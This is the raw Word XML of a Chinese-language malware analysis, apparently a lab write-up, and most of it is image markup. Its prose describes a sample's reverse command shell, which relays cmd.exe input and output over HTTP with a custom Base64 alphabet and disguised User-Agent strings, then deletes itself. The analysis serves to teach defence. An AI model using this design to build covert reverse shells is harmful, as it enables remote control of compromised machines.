                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3095625" cy="1263650"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3122930" cy="1344930"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1143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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3122930" cy="134493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询受影响的参数值，看到这一参数值的含义为INTERNET_FLAG_RELOAD标志。当这个标志被置位时，它会在第一次信令中产生Cache-Control:no-cache,这也展示了使用这些高级协议接口而不使用底层socket调用的好处。使用底层socket调用的恶意代码需要在代码中显式地包含Cache-Control:no-cache字符串，因此会让它更容易被识别为恶意代码，并且在试图模仿合法流量时可能会犯错误。</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为所有最终使用Internet联网函数的用户函数创建一个交叉引用图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2967990" cy="2299970"/>
            <wp:effectExtent l="0" t="0" r="3810" b="127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4">
                      <a:lum bright="6000" contrast="6000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2967990" cy="2299970"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="1668145"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>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35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264785" cy="166814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恶意代码有两个不同并且对称的部分。WinMain中检查第一个CreateThread调用。表明sub_4014C0，标记为StartAddress的函数是一个新线程的开始地址。0x004015CO处的函数(被标志为s_thread2_start)也是一个新线程的开始地址。</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422775" cy="2684145"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13335"/>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36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4422775" cy="2684145"/>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521200" cy="2491105"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>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37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4521200" cy="249110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查看StartAddress(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_4014C0)，看到除了s_Interent1(sub_401750)函数外，也调用malloc、PeekNamedPipe、ReadFile、ExitThread、Sleep以及其他一些内部函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4293235" cy="4040505"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13335"/>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38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4293235" cy="4040505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4276725" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>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39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4276725" cy="2724150"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3958590" cy="2345690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="127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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3958590" cy="234569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查看sub_4015C0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4062730" cy="3991610"/>
            <wp:effectExtent l="0" t="0" r="6350" b="127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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4062730" cy="3991610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4044315" cy="2704465"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
            <wp:docPr id="4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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4044315" cy="2704465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4005580" cy="3879850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="4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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4005580" cy="3879850"/>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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3808730" cy="3595370"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="4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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3808730" cy="359537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s_thread2_start(sub_4015C0)上的函数包含一个相似的结构，也有s_Internet2(sub_401800)、malloc、WriteFile、ExitThread和Sleep调用。函数PeekNamedPipe用来监测命名管道的新输入(与命令shell相关的stdin和stdout都是命名管道)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看WinMain，在WinMain启动两个线程之前，它调用了函数CreatePipeA、GetCurrentProcess、DuplicateHandle以及CreateProcessA。函数CreateProcessA创建一个新的cmd.exe进程，其他函数设置新进程，使stdin和stdout与提供的命令进程的句柄进行绑定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3148965" cy="4347210"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3148965" cy="434721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这个恶意代码的编写者按照一种常见模式，来建立一个反向的命令shell。攻击者启动一个新的命令shell作为它的进程，并启动单独的线程向命令shell读取输入和写入输出。</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StartAddress(sub_4014C0)线程使用PeekNamedPipe,检查命令shell的新输入，如果检查内容存在，它就用ReadFile读取数据。</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3887470" cy="3526155"/>
            <wp:effectExtent l="0" t="0" r="13970" b="9525"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3887470" cy="352615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只要读取这些数据，它就通过函数s_Internet1(sub_401750)将读取内容发送到一个远程位置。</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3924935" cy="4242435"/>
            <wp:effectExtent l="0" t="0" r="6985" b="9525"/>
            <wp:docPr id="5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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924935" cy="424243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另一个线程s_thread2_start(sub_4015C0)使用s_Internet2(sub_401800),连接一个远程位置，如果命令shell上有任何新输入，这个线程都会将它们写入到命令shell的输入管道。</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3718560" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3718560" cy="3267075"/>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3836035" cy="3155950"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3836035" cy="315595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回到传递给s_Internet1(sub_401750)中Internet函数的参数，来查找组成这些参数的原始信息来源。函数InternetopenUrlA将一个URL作为参数，随后看到它作为一个参数，传递给这个函数，并且在靠近函数开头的地址将它复制到一个缓冲区中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4477385" cy="516890"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4477385" cy="516890"/>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2914015" cy="5048885"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="5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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2914015" cy="504888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在前面标注为StartAddress的函数(0x004014C0)中，看到URL也是一个参数。</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354830" cy="481330"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4354830" cy="48133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当追踪URL的来源时，需要回溯回到WinMain(0x4011C0)和LoadStringA调用的开始。检查PE文件的资源部分，看到它有个用于信令的URL。事实上，这个URL与两个线程发送信令的用法相似。</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239260" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="12700" b="8255"/>
            <wp:docPr id="5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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4239260" cy="239966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已经确定s_Internet1(sub_401750)中一个参数是URL（lpszUrl）,另一个参数是User-Agent域。</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3787775" cy="3559810"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:docPr id="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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3787775" cy="355981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转到s_Internet1(sub_401750),在函数开头看到静态字符串(!&lt;,它与信令中看到的User-Agent字符串开头相匹配，但是，与一个长字符串进行连接后，作为s_Internet1(sub_401750)的一个参数传给s_Internet1。</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3082925" cy="1250315"/>
            <wp:effectExtent l="0" t="0" r="10795" b="14605"/>
            <wp:docPr id="6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9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3082925" cy="125031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在s_Internet1(sub_401750)调用之前，位于0x40155B处的一个内部函数（sub_401000）接收两个输入参数，并输出User-Agent字符串中的主要内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4399915" cy="3165475"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
            <wp:docPr id="6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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4399915" cy="3165475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3909695" cy="3346450"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:docPr id="6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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3909695" cy="3346450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3695700" cy="3580130"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1270"/>
            <wp:docPr id="6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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3695700" cy="3580130"/>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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3773170" cy="2745105"/>
            <wp:effectExtent l="0" t="0" r="6350" b="13335"/>
            <wp:docPr id="6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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3773170" cy="274510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这个编码函数是一个自定义的Base64变种，它使用了如下的Base64字符串。</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WXYZlabcd3fghijko12e456789ABCDEFGHIJKL+/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NOPQRSTUVmn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pqrstuvwxyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="both"/>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解码第一个信令的字符串后，结果如下：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Microsoft Windows XP [Version 5.1.2600]</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(C)Copyright 1985-2001 Microsoft Corp.</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C:\Documents and Settings\user\Desktop&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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位于s_Internet2中的另一个线程(sub_401800)使用Internet函数。s_Internet2与s_Internet1使用相同的URL作为参数。函数中User-Agent字符串被静态定义为Internet Surf.</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093210" cy="2978785"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="6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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4093210" cy="297878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s_thread2_start(sub_4015C0)线程被用来向命令shell传递输入。它也有根据输入内容来终止程序的功能。如果操作者传递给恶意代码字符串exit,随后恶意代码将会退出。</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3562985" cy="3848735"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="6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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562985" cy="384873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位于s_thread2_start(0x4015C0)处的代码块1oc_40166B,包含了对exit字符串和strnicmp函数(用来测试传入的网络内容)的引用。</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这两个线程中分别处理命令shell的不同管道端。含有静态User-Agent字符串的线程从远程攻击者获得输入内容，含有编码User-Agent字符串的线程则作为命令shell的输出。攻击者混淆他们的行为，避免从感染的服务器发送明文的命令提示，是一种聪明的方法。</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恶意代码退出时会尝试删除自己，这显示它是作为攻击者一次性使用的组件。在WinMain(0x004011C0)中，有三个可能的函数结局。前两个是当线程没有成功创建线程时会发生终止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4119880" cy="2240280"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="7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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119880" cy="2240280"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4158615" cy="2403475"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="7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9"/>
